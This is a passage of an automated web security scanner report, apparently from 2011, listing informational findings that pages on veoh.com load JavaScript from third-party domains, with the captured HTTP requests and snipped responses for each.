<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.405. http://www.veoh.com/browse/music  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/music

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/music HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=12
Content-Length: 69925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768959"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.406. http://www.veoh.com/browse/music/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/music/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/music/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 69925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769487"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.407. http://www.veoh.com/browse/tvshows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/tvshows

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/tvshows HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:33:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=54
Content-Length: 78636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768802"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.408. http://www.veoh.com/browse/tvshows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/tvshows/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/tvshows/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:00 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 78636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769140"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.409. http://www.veoh.com/browse/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:30:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=57
Content-Length: 116662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768607"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.410. http://www.veoh.com/browse/videos/category/action_adventure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:24 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 115983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768565"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.411. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 135910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18647177dJ8p2YBE&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768476"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.412. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 134924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v189741093prNNZM5&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768502"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.413. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:02 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768543"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.414. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The response dynamically includes the following scripts from other domains:

